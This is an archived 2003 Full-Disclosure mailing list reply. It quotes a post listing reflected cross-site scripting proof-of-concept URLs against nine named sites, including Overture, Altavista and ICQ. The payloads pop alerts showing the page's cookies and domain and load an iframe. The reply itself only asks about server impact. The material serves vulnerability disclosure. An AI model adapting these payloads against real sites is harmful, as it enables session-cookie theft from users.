Re: [Full-Disclosure] Search Engine XSS

From: Shanphen Dawa (list_at_hardlined.com)
Date: 07/23/03

  • Next message: lee.e.rian_at_census.gov: "RE: [Full-Disclosure] Re: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover"
    To: full-disclosure@lists.netsys.com
    Date: Wed, 23 Jul 2003 13:02:36 -0500
    
    

    Yes but what affect does this have on the server? How does it comprimise security? Can you use this to DoS the server? Can you use this to gain access to areas on the server otherwise not available?

    On Wed, 23 Jul 2003 02:18:05 -0700
    "morning_wood" <se_cur_ity@hotmail.com> wrote:

    > since were on the subject now... ill clear up my backlog...
    >
    > Sites Affected...
    >
    > Overture
    > Altavista
    > MetaCrawler
    > Excite
    > Webcrawler
    > InfoPlease
    > MarketWatch
    > Icq
    > Looksmart
    >
    >
    >
    > http://www.overture.com/d/search/;$sessionid$EVV5ZDIABJG13QFIEEOQPUQ?Keywords=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e
    >
    > http://www.altavista.com/web/results?pg=q&user=icq&q=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e
    >
    > http://www.metacrawler.com/_1_2IWUTDE03H14GMK__info.metac/dog/webresults.htm?&qkw=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&qcat=web&method=0&top=1&start=&ver=4049
    >
    > http://msxml.excite.com/_1_GMJTDE03H58B8U__info.xcite/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&start=&ver=13896
    >
    > http://dpxml.webcrawler.com/_1_HEMTDE03GPDFH2__info.wbcrwl/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw=%3cscript%3ealert%28%22You+are+vunerable+
    > to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%
    > 3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSC
    > RIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%
    > 3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&start=&ver=22324
    >
    > http://www.infoplease.com/search.php3?src=icq&query=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&in=all
    >
    > http://bigcharts.marketwatch.com/symbollookup/symbollookupresults.asp?symb=>alert("You%20are%20vunerable%20to%20xss%20-%20discovered%20by%20morning_wood%20http://exploitlabs.com")</script><SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT><iframe%20src="http://whatismyip.com"></iframe>&country=all&type=all
    >
    > http://search.icq.com/search/results?q=%3Cscript%3Ealert%28%22You+are+vunerable+to+xss+%2D+discovered+by+morning%5Fwood+http%3A%2F%2Fexploitlabs%2Ecom%22%29%3C%2Fscript%3E%3CSCRIPT%3Ealert%28document%2Edomain%29%3B%3C%2FSCRIPT%3E%3CSCRIPT%3Ealert%28document%2Ecookie%29%3B%3C%2FSCRIPT%3E%3Ciframe+src%3D%22http%3A%2F%2Fwhatismyip%2Ecom%22%3E%3C%2Fiframe%3E
    >
    > http://www.looksmart.com/r_search?l&key=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&search=0
    >
    > this just shows the basics, some are worse than others...
    > so I guess thats all of em...
    >
    > Donnie Werner
    > morning_wood@exploitlabs.com
    > http://exploitlabs.com
    >
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.netsys.com/full-disclosure-charter.html
    >

    -- 
    /*
    "To avoid all evil, to cultivate good, 
    and to cleanse one's mind  
    this is the teaching of the Buddhas."
    Martin Ekendahl
    http://www.hardlined.com
    martin@hardlined.com
    */
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    

  • Next message: lee.e.rian_at_census.gov: "RE: [Full-Disclosure] Re: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover"